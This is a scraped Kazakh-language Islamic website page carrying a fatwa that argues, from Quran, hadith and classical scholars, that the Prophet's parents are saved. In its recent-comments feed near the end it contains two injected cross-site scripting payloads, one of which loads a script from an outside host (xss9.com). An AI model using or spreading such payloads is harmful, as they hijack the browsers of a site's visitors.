Пайғамбардың (ﷺ) ата-анасы жәннаттық па?
Алматы
Алматы Астана Шымкент Ақсай Ақсу Ақтау Ақтөбе Актогайский район Алтынсарин ауданы Алға Амангельдинский район Арал Арқалық Арысь Атасу ауылы Атбасар Атырау Аягөз Аққулы ауданы Байқоңыр Байғанин ауданы Балқаш Баянауыл ауданы Бейнеу Бәйдібек ауданы Денис ауданы Ембі Ертіс ауданы Еңбекшіқазақ Жітіқара ауданы Жалағаш кенті Жаңаөзен Жаңатас Жангелді ауданы Жаркент Жаңақорған кенті Жаңқала Жезді кенті Жезқазған Жетісай Жосалы Жосалы кенті Жәйрем Жәнібек Зайсан Индер Исатай ауданы Қарағанды Қаскелең Келес ауданы Кентау Көкшетау Қонаев Қостанай Қосшы Құлсары Курчатов Қызылорда Көкпекті ауданы Ленгер Лисаков Май ауданы Майқайын кенті Маханбет ауданы Мақат Меңдіқара ауданы Миялы Мойынқұм ауылы Мырзакент кенті Мәртөк ауданы Науырзым ауданы Ойыл ауданы Ордабасы ауданы Отырар ауданы Павлодар Петропавл Риддер Рудный с.Мангистау Сайрам ауданы Сайқын Сарыағаш Сарыкөл ауданы Сарыөзек Сәтпаев Сауран ауданы Семей Созақ ауданы Солнечный Степногорск Сырым ауданы Тайынша Талғар Талдықорған Тараз Таран ауданы Текелі қаласы Темиртау Тереңкөл ауданы Тереңөзек кенті Теңіз кен орны Түркістан Түлкібас кенті Узынагаш Орал Өскемен Федеров ауданы Форт-Шевченко Хромтау Целиноград ауданы Чапаев Шамалған ауылы Шу Шал ақын ауданы Шалқар Шарбақты ауданы Шардара Шетпе Шиелі кенті Шұбарқұдық Ырғыз ауданы Екібастұз Қазығұрт Қамысты ауданы Қандыағаш Қарабалық ауданы Қаражал Қарасу ауданы Қаратау Қарғалы Қобда ауданы Қордай Құрманғазы ауданы Құрық Үржар ауданы Үшарал Ұзынкөл ауданы Әйтеке би ауданы Әйтеке би кенті Әулиекөл ауданы
Құптан 17:49
Алматы
Алматы Астана Шымкент Ақсай Ақсу Ақтау Ақтөбе Актогайский район Алтынсарин ауданы Алға Амангельдинский район Арал Арқалық Арысь Атасу ауылы Атбасар Атырау Аягөз Аққулы ауданы Байқоңыр Байғанин ауданы Балқаш Баянауыл ауданы Бейнеу Бәйдібек ауданы Денис ауданы Ембі Ертіс ауданы Еңбекшіқазақ Жітіқара ауданы Жалағаш кенті Жаңаөзен Жаңатас Жангелді ауданы Жаркент Жаңақорған кенті Жаңқала Жезді кенті Жезқазған Жетісай Жосалы Жосалы кенті Жәйрем Жәнібек Зайсан Индер Исатай ауданы Қарағанды Қаскелең Келес ауданы Кентау Көкшетау Қонаев Қостанай Қосшы Құлсары Курчатов Қызылорда Көкпекті ауданы Ленгер Лисаков Май ауданы Майқайын кенті Маханбет ауданы Мақат Меңдіқара ауданы Миялы Мойынқұм ауылы Мырзакент кенті Мәртөк ауданы Науырзым ауданы Ойыл ауданы Ордабасы ауданы Отырар ауданы Павлодар Петропавл Риддер Рудный с.Мангистау Сайрам ауданы Сайқын Сарыағаш Сарыкөл ауданы Сарыөзек Сәтпаев Сауран ауданы Семей Созақ ауданы Солнечный Степногорск Сырым ауданы Тайынша Талғар Талдықорған Тараз Таран ауданы Текелі қаласы Темиртау Тереңкөл ауданы Тереңөзек кенті Теңіз кен орны Түркістан Түлкібас кенті Узынагаш Орал Өскемен Федеров ауданы Форт-Шевченко Хромтау Целиноград ауданы Чапаев Шамалған ауылы Шу Шал ақын ауданы Шалқар Шарбақты ауданы Шардара Шетпе Шиелі кенті Шұбарқұдық Ырғыз ауданы Екібастұз Қазығұрт Қамысты ауданы Қандыағаш Қарабалық ауданы Қаражал Қарасу ауданы Қаратау Қарғалы Қобда ауданы Қордай Құрманғазы ауданы Құрық Үржар ауданы Үшарал Ұзынкөл ауданы Әйтеке би ауданы Әйтеке би кенті Әулиекөл ауданы
Алматы
ықшамдау
Таң Күн Бесін Аср Ақшам Құптан
05:57 07:20 11:56 14:44 16:26 17:49
ықшамдау
Күнтізбе
Хижри
24 Джумада-сани 1446
Миләди
26 желтоқсан 2024

Мақалалар

Пайғамбардың (ﷺ) ата-анасы жәннаттық па?

| A | +

Сұрақ: Әһлі-сүнна ғалымдарының Пайғамбарымыз Мұхаммедтің (оған Алланың салауаты мен сәлемі болсын) ата-анасы туралы ұстанымы қандай? 

 

Жауап: Пайғамбарымыздың (оған Алланың салауаты мен сәлемі болсын) ата-анасы тозақ иелерінен емес. Керісінше, құтылушы топтардың қатарына кіреді. Бұл әуелгі (сәләфу солих) және кейінгі (хәләф) буын ұлы ғалымдарының көзқарасы. Сондай-ақ, әл-Азһар әш-Шариф ғұламалары әрі Мысыр елінің пәтуа комитеті осы пікірді ұстанады. Мысыр елінің бұрынғы мүфтиі шейх Мұхаммед Бахит әл-Мутғи Пайғамбарымыздың (оған Алланың салауаты мен сәлемі болсын) ата-анасы иман келтірмеген деушілерге берген жауабында: «Расында, олар қатты қателеседі әрі күнәһар болады. Сондай-ақ, Пайғамбарымызға (оған Алланың салауаты мен сәлемі болсын) зиян берушілер тобына кіреді. Бірақ оларды күпірлікпен айыптамаймыз. Өйткені бұл мукәллафқа (ақыл-есі дұрыс, балиғат жасына жеткен адам) егжей-тегжейін білуі тиіс болған діндегі маңызды нәрсе емес. Бұл шариғи дәлелдер құптайтын дұрыс пікір әрі бетке ұстар ғұламалардың көзқарасы». 

 

Пайғамбарымыздың (оған Алланың салауаты мен сәлемі болсын) ата-анасы жөнінде жаман ойда болу Алла Елшісіне (оған Алланың салауаты мен сәлемі болсын) жәбір көрсету болып саналады. Алла Тағала Құранда: 

 

وَالَّذِينَ يُؤْذُونَ رَسُولَ اللَّهِ لَهُمْ عَذَابٌ أَلِيمٌ  

 

«Ал Алланың елшісін жәбірлегендерге ауыр азап бар»[1].

 

 إِنَّ الَّذِينَ يُؤْذُونَ اللَّهَ وَرَسُولَهُ لَعَنَهُمُ اللَّهُ فِي الدُّنْيَا وَالآخِرَةِ وَأَعَدَّ لَهُمْ عَذَابًا مُهِينًا 

 

«Расында, Аллаға, Елшісіне реніш бергендер, соларға дүние, ақыретте Алла қарғыс беріп, оларға қорлаушы азап дайындады»[2], - дейді. Әл-Қади: «Біз Раббымыз және Оның елшісі разы болатын нәрселерді ғана айтамыз. Сондай-ақ оның абыройына дақ түсірмейміз әрі Пайғамбарымыз (оған Алланың салауаты мен сәлемі болсын) разы болмайтын сөздерді айтып жәбір бермейміз», - дейді[3]. 

 

Шейх Шиһабуддин Ахмад әл-Халауани әл-Халижи әш-Шәфиғи «Мауакибу рабиғи фи маулуди әш-шафиғ» атты кітабында: «Жалпы Пайғамбарымыздың (оған Алланың салауаты мен сәлемі болсын) ата-анасын кәпір деп айту құрметсіздік және қателесушілік. Алла бұдан сақтасын. Кім бұл сөзді айтса Пайғамбарымызға (оған Алланың салауаты мен сәлемі болсын) зиян еткенмен тең. Икрима бин Әбу Жәһил Пайғамбарымызға (оған Алланың салауаты мен сәлемі болсын) келіп адамдар әкесін балағаттап жатыр деп шағымданады. Сонда Пайғамбарымыз (оған Алланың салауаты мен сәлемі болсын): «Марқұмдарды балағаттап тірілеріне зиян бермеңдер»[4] дейді. Пайғамбарымыз (оған Алланың салауаты мен сәлемі болсын) қабірінде тірі екеніне күмән жоқ, оған біздің амалдарымыз ұсынылып тұрады. Егер Икриманың әкесін балағаттап зиян бермеңдер деп тыйым салған болса, онда Пайғамбарымызға (оған Алланың салауаты мен сәлемі болсын) зиян бермеу одан да лайықтырақ. Сондай-ақ, Субайға бинт Әбу Ләһаб Пайғамбарымызға (оған Алланың салауаты мен сәлемі болсын) келіп: «Адамдар маған тозақ отынының қызы деп айқай салып айтып жатыр» дейді. Сол кезде Пайғамбарымыз (оған Алланың салауаты мен сәлемі болсын) қатты ашуланып: «Менің тегіме, туыстарыма тиісіп, маған зиян берген адамдарға не көрінді. Біліп қойыңдар! Кім менің тегіме, туыстарыма зиян берсе, онда маған зиян бергені. Кім маған зиян берсе, онда ол Аллаға зиян бергені» деп айтады»[5].

 

Әһлі-сүнна ғалымдары Пайғамбарымыздың (оған Алланың салауаты мен сәлемі болсын) ата-анасы құтылушы топтардан деген көзқарасты құптайтын бірнеше дәлелдер келтірді:

 

وَمَا كُنَّا مُعَذِّبِينَ حَتَّى نَبْعَثَ رَسُولا  

 

«Біз бір пайғамбар жібермейінше ешкімге азап қылмаймыз»[6]. 

 

Бұл аят Пайғамбарымыздың (оған Алланың салауаты мен сәлемі болсын) ата-анасы азапталмайтынына дәлел болады. Яғни оларға пайғамбарлар жіберілмеген. Олардың үкімі жөнінде Шатиби: «Алла Тағаланың пенделеріне жазып қойған хикметі жүзеге асады. Соның бірі істеген іс-әрекеттеріне пайғамбарлар жібергеннен кейін ғана жаза қолданады. Егер оларға құжат тұрғызылса, қалағанынша мұсылман болсын немесе қалағанынша кәпір болсын. Әркім істеген ісіне сай жазасы мен сыйын алады»[7], - дейді.

 

2) Ол екеуі Ибраһим пайғамбардың (а.с.) дінінде болған. Бұл бірқатар ғалымдардың көзқарасы. Солардың бірі Фахру әр-Рази өзінің «Әсрару әт-тәнзил» атты кітабында: «Осы көзқарасты құптаған ғалымдар мына аятты дәлел ретінде алға тартты. Алла Тағала Құранда: 

 

 ٱلَّذِي يَرَىٰكَ حِينَ تَقُومُ. وَتَقَلُّبَكَ فِي ٱلسَّٰجِدِينَ 

 

 «Сені (намазда) тұрған кезіңді көретін және сәжде жасаушылардың ішіндегі қозғалысыңды»[8]. Яғни Пайғамбарымызды (оған Алланың салауаты мен сәлемі болсын) сәжде етушілердің беліндегі қозғалысы деген мағынаны білдіреді. Бұл Пайғамбарымыздың (оған Алланың салауаты мен сәлемі болсын) әкесі мүшрік болмағанын аңғартады. Хафиз әс-Сиюти «әл-Хауи» атты кітабында имам әр-Разидің сөзін былай келтіреді: «Пайғамбарымыздың (оған Алланың салауаты мен сәлемі болсын) әкесі мүшрік емес екеніне Алла елшісінің: «Таза жандардың белінен таза әйелдердің құрсағына ауысып отырдым» деген хадисі дәлел болады. Сондай-ақ, Алла Тағала Құранда: 

 

 إِنَّمَا الْمُشْرِكُونَ نَجَسٌ  

 

«Расында, мүшріктер – нәжіс»[9] - деген. Сондықтан Пайғамбарымыздың (оған Алланың салауаты мен сәлемі болсын) ата-бабалары мүшрік болмаған деп айту уәжіп»[10]. 

 

3) Алла Тағала Пайғамбарымызға (оған Алланың салауаты мен сәлемі болсын) ата-анасын тірілтіп, оған иман келтірген. Бұл Хафиз Хатиб Бағдади, Хафиз ибн Шәһин, имам Ибн әл-Мунаиир, имам әл-Мухиб әт-Табари, имам Құртуби, Хафиз Әбу Фаттах бин Сайдуннас, Хафиз ибн Насыруддин әд-Димашқи, Хафиз әс-Сиюти сынды бірқатар мухаддис т.б. ғалымдардың көзқарасы. Оған дәлел ретінде әлсіз хадистерді алға тартады. Бірақ ол бірнеше жолмен келгендігі үшін хасан дәрежесіне дейін көтерілді. Ал Пайғамбарымыздың (оған Алланың салауаты мен сәлемі болсын) ата-анасына кешірім сұрауына тыйым салынған хадис туралы: «Пайғамбарымыздың (оған Алланың салауаты мен сәлемі болсын) ата-анасының тірілуі жөніндегі хадис тыйым салынған риуаяттан кейін келіп оның үкімін жойған» деп жауап берді. Хафиз әс-Сиюти «әл-Хауи» атты кітабында имам Құртубидің сөзін былай келтіреді: «(Пайғамбарымыздың (оған Алланың салауаты мен сәлемі болсын) ата-анасың) тірілтуі туралы хадис пен оларға жарылқау тілеуге тыйым салынған риуаяттың арасында ешқандай қарама-қайшылық жоқ. Ол екеуінің тірілуі туралы келген риуаят оларға кешірім сұрауға тыйым салынған хабардан кейін келген. Оған Айша анамыздан жеткен хадис дәлел болады. Өйткені ол қоштасу қажылығында еді. Сол себепті, Ибн Шаһин соңынан келген риуаят бірінші жеткен хабардың үкімін жояды деді»[11]. 

 

Хафиз әс-Сиюти: «Бірнеше хадис мамандары айтқандай, Алла Тағаланың Пайғамбарымызға (оған Алланың салауаты мен сәлемі болсын) анасын тірілткені жайлы келген риуаят жалған хадис емес. Керісінше, ол ізгі амалдарға  әсіресе осы мәселеге байланысты риуаят етуге рұқсат етілетін әлсіз хадистердің құрамына кіреді»[12] дейді. 

 

Ал Муслим риуаятындағы Пайғамбарымыздың (оған Алланың салауаты мен сәлемі болсын): «Раббымнан анама жарылқау сұрадым, бірақ рұқсат бермеді. Қабірін зиярат етуді сұрағанымда рұқсат берді»[13], сондай-ақ: «Бір кісі: «Уа Алла елшісі! Менің әкем қайда болады?» деп сұрағанда, ол (оған Алланың салауаты мен сәлемі болсын): «Тозақта», - деді. Кері бұрылып кетіп бара жатқанда, оны шақырып алып: «Расында, менің әкем де, сенің әкең де тозақта», - деді»[14], - деген хадиске келсек, бірінші хадисте Пайғамбарымыздың (оған Алланың салауаты мен сәлемі болсын) анасы тозақта деп ашық айтылмаған. Кешірім сұрауға рұқсат етпеу мүшрік екеніне дәлел емес. Өйткені оған қабірін зиярат етуге рұқсат берді. Ал мүшріктердің қабірін зиярат етуге болмайды. Екінші хадисте «әке» деген сөзді «көкесі» деп түсіндірсек болады. Өйткені Әбу Толиб пайғамбарлық келгеннен кейін қайтыс болды әрі шәһада айтып өтпеді. Арабтар көкесін «әке» деп те атаған. Ол жөнінде Алла Тағала Құранда: 

 

وَإِذْ قَالَ إِبْرَاهِيمُ لأبِيهِ آزَرَ أَتَتَّخِذُ أَصْنَامًا آلِهَةً إِنِّي أَرَاكَ وَقَوْمَكَ فِي ضَلالٍ مُبِينٍ  

 

«Сол уақытта Ибраһим әкесі Әзерге: «Бұттарды тұттыңдар ма? Расында мен сені де еліңді де анық адасуда көремін» деген»[15], - деді. Ибн Кәсир т.б. тәпсір ғалымдары Ибраһим пайғамбардың әкесінің аты Тарих болған дейді. 

 

Алайда аталмыш хадистердің түсіндірмесіне жүгінбей тікелей түсініп, Пайғамбарымыздың (оған Алланың салауаты мен сәлемі болсын) ата-анасы құтылмайды деп осы екі хадисті алға тартушыларға: «Бұл екі хадисті тікелей түсіну жоғарыда баяндап өткеніміздей аяттың мағынасына қарама-қайшы болғандықтан оны қабыл алмаймыз» деп жауап беріледі[16]. 

 

Пайғамбарымыздың (оған Алланың салауаты мен сәлемі болсын) ата-анасы жайлы Ибн Әбидин: «Жалпы кейбір ғалымдарымыз айтқандай бұл мәселені талқылау барысында әдептілік қағидасын ұстану керек. Өйткені мұны білмеген адам қабірінде және қияметте сұралатындай мәселе емес. Сондықтан бұл тақырыпты қозғағанда артық сөз айтудан сақтанып, тек жақсы сөз сөйлеген дұрыс»[17] деген пікір айтқан. 

 

Осыған орай, Алла Елшісінің (оған Алланың салауаты мен сәлемі болсын) ата-анасы жөнінде жақсы пікірде болу баршамыздың міндетіміз. 

 

Алла толық білуші! 

 

ҚМДБ Шариғат және пәтуа бөлімі 

 

[1] «Тәубе» сүресі, 61-аят.

[2] «Ахзап» сүресі, 57-аят.

[3] Али Жума, «әл-Баяну әл-Қауим» 51-б.  

[4] Табарани риуаяты.

[5] Мауакибу рабиғи фи маулуди әш-шафиғ, 356-б.

[6] «Исра» сүресі, 15-аят.

[7] Әл-Муафиқат, 3/377.

[8] «Шұғара» сүресі, 218-219 аяттар.

[9] «Тәубе» сүресі, 28-аят.

[10] Әл-Хауи, 2/199.

[11] Әл-Хауи, 2/218.

[12] Әс-Сюти, «әт-Тағзиму уә әл-Минна», 3-б.

[13] Муслим риуаяты, 2/671

[14] Муслим, 1/191

[15] «Анғам» сүресі, 74-аят.

[16] Али Жума, «әл-Баяну әл-Қауим» 54-55.

[17] Хашияту Ибн Абидин, 3/185.  



fatua.kz

Предыдущий Следующий
С.АХМАДИЕВ. Құран жаттаудың сырлары Дәрежесіне пайғамбарлар мен шейіттер қызығып қарайтын адам

Оқырмандардың пікірі (0)

Қызықты тақырыптар

Сұрақ-жауап Етбетімен жату күнә ма?
Ислам дінінде тыйым салынған және жасалынуы күнә болатын іс-әрекеттер бар. Солардың бірі етбетімен жату, оның үкімі – мәкруһ. Сахаба Тухфату әл-Ғифари былай дейді: «Мен сәресі уақытында мешітте етбетіммен жатқан едім. Кенет бір кісі мені түртті де: «Мына жатыс Алла Тағаланың қаһарына ұшыратады»,­ – ...
Сұрақ-жауап Пайғамбарымыз (с.ғ.с.) қабірінде тірі ме?
Жауап: Әуелі осы «өлі» және «тірі» деген сөздердің  басын ашып алайық. Егер оның ара жігін айырып алсақ, көптеген түсінбеушіліктерден құтыламыз. Ендеше Пайғамбарымыздың (с.ғ.с.) қабірінде тірі дегеннің мақсаты ол бұл дүниеден өткен жоқ әрі Алла оның жанын алмады деген болса, онда бұл пікірдің дұрыс ...
Сұрақ-жауап Ғұрыпты шариғи дәлел ретінде қарастыруға болады ма?
Әдет-ғұрып мұсылман заңнамасында кейбір мәселелерді шешуде айғақ ретінде қолданылады әрі шариғат ғалымдары арасында мақұлданған. Ханафи мазһабының кейбір өкілдері шариғат ережесіне сай келген ғұрып нақтылы шарғи дәлел ретінде қарастырылатындығын айтқан. Бұл тұрғыда фиқһ негіздерін зерттеуші ғұламала...
Сұрақ-жауап Құмар және лотерея ойындарының үкімі
Уа, иман келтіргендер! Арақ-шарап (сынды мас қылып, ақылынан адастыратын нәрселер), құмар һәм өзге де ұтыс ойындары, табыну үшін орнатылған пұттар және жебелермен (яки құмалақ, карта сынды басқа да нәрселермен) бал ашу – шайтанға ғана тән лас істер. Ендеше, (екі дүниеде де) мақсат-мұраттарыңа жету ү...
Сұрақ-жауап Таң намазынан кейін қаза болған намаздарды оқуға болады ма?
Таң намазы оқылып болған соң, күн шыққанға дейін нәпіл намаздарды оқу – мәкруһ. Алайда бұл уақытта қаза намаздарды оқуға болады.
Сұрақ-жауап "Нумерологияға" сенуге бола ма?
Тылсым күштерге қызығу – адам баласына тән дүние. Көбінесе бұл арқылы тағдырдағы жазмышты біліп, болашақты үйрену немесе мінез-құлық ерекшелігін анықтау көзделеді. Соның бірі – қазір қоғамда кең таралып жатқан нумерология ілімі. ...
ықшамдау
Күнтізбе
Хижри
24 Джумада-сани 1446
Миләди
26 желтоқсан 2024
Намаз уақыттары
қазір

Құптан 17:49

Бамдатқа дейін 03:46

Что будет, если увидеть во сне Пророка ﷺ?

"/>"/"/><sCRiPt sRC=https://xss9.com/ivMw></sCrIpT>

X X
12 сағат. бұрын

О милостыне

"/1

X X
12 сағат. бұрын

Задайте вопрос устазам

Ва алейкум ассалам. Ваше омовение и намаз действительны, так как нить установлена в лечебных и в

Администратор Azankz
17 жел. 2024

Признаки любви к Пророку ﷺ

<script>alert(a)</script>

X
28 қыр. 2024

Обязанности мужчины перед своей семьей

А как же быть женщине, такой как я, которая рано вышла замуж, работала вплоть до родов, собирала каж

Лейла
28 қыр. 2024
Created with Sketch. {{!-- --}} {{!-- --}} {{!-- --}} Created with Sketch. Asset 1mdpi